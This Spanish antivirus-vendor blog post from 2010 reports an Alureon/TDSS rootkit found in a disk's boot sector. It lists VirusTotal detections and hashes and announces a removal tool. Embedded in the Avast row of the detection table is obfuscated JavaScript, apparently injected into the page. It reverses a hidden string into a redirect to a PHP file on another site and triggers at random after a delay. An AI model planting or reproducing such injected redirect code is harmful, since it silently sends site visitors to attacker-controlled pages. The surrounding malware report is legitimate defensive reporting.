Nuevo RootKit ALUREON en el codigo del MBR del disco duro de arranque

Gracias a la utilidad COPYMBR.EXE hemos recibido fichero extraido del MBR de un disco duro en el que se notaban deficiencias sin que se detectara nada en los ficheros, por lo que pensó que podía lanzarse desde el MBR, como hacen el Sinowal y otros que el Downloader Bredolab inserta en dicho sector.

A partir del ELISTARA 22,23 de pasamos a controlar y sustituir dicho codigo por el correspondiente de Microsoft, si se detecta en el MBR, manteniendo los datos de las particiones.

File name: MBR001.HD1
Submission date: 2010-12-20 08:50:10 (UTC)
Current status: finished
Result: 16 /43 (37.2%)
 VT Community

malware
 Safety score: 0.0% 
Compact Print results Antivirus Version Last Update Result
AhnLab-V3 2010.12.20.00 2010.12.19 –
AntiVir 7.11.0.85 2010.12.20 BOO/Alureon.A
Antiy-AVL 2.0.3.7 2010.12.20 –
Avast 4.8.1351.0 2010.12.19 $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:Alureon@mbr”>Alureon@mbr
AVG 9.0.0.851 2010.12.19 Win32/Alureon.MBR
BitDefender 7.2 2010.12.20 Rootkit.Tdss.AW
CAT-QuickHeal 11.00 2010.12.20 –
ClamAV 0.96.4.0 2010.12.20 –
Command 5.2.11.5 2010.12.19 –
Comodo 7126 2010.12.20 –
DrWeb 5.0.2.03300 2010.12.20 BackDoor.Tdss.4005
Emsisoft 5.1.0.1 2010.12.20 Rootkit.Win32.TDSS!IK
eSafe 7.0.17.0 2010.12.19 –
eTrust-Vet 36.1.8048 2010.12.17 –
F-Prot 4.6.2.117 2010.12.19 –
F-Secure 9.0.16160.0 2010.12.20 Rootkit.Tdss.AW
Fortinet 4.2.254.0 2010.12.19 –
GData 21 2010.12.20 Rootkit.Tdss.AW
Ikarus T3.1.1.90.0 2010.12.20 Rootkit.Win32.TDSS
Jiangmin 13.0.900 2010.12.19 Rootkit.TDSS.eny
K7AntiVirus 9.73.3286 2010.12.18 –
Kaspersky 7.0.0.125 2010.12.20 Rootkit.Win32.TDSS.mbr
McAfee 5.400.0.1158 2010.12.20 –
McAfee-GW-Edition 2010.1C 2010.12.19 –
Microsoft 1.6402 2010.12.20 Trojan:DOS/Alureon.A
NOD32 5716 2010.12.19 –
Norman 6.06.12 2010.12.19 –
nProtect 2010-12-20.01 2010.12.20 –
Panda 10.0.2.7 2010.12.19 –
PCTools 7.0.3.5 2010.12.20 –
Prevx 3.0 2010.12.20 –
Rising 22.78.06.04 2010.12.20 –
Sophos 4.60.0 2010.12.20 Troj/TdlMbr-A
SUPERAntiSpyware 4.40.0.1006 2010.12.20 –
Symantec 20101.3.0.103 2010.12.20 –
TheHacker 6.7.0.1.101 2010.12.15 –
TrendMicro 9.120.0.1004 2010.12.20 –
TrendMicro-HouseCall 9.120.0.1004 2010.12.20 –
VBA32 3.12.14.2 2010.12.17 Rootkit.Win32.TDSS.bj
VIPRE 7728 2010.12.20 Trojan.Boot.Alureon.a (v)
ViRobot 2010.12.20.4210 2010.12.20 –
VirusBuster 13.6.102.0 2010.12.19 –
Additional informationShow all 
MD5   : 654fff3591454b681ce56bd97578caa7
SHA1  : 3b55ac35b5f037506fca7f17149515366b42b32b

A partir de las 19 horas de hoy estará disponible en nuestra web el ELISTARA 22.23 que lo controla y elimina

saludos

ms, 20-12-2010

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies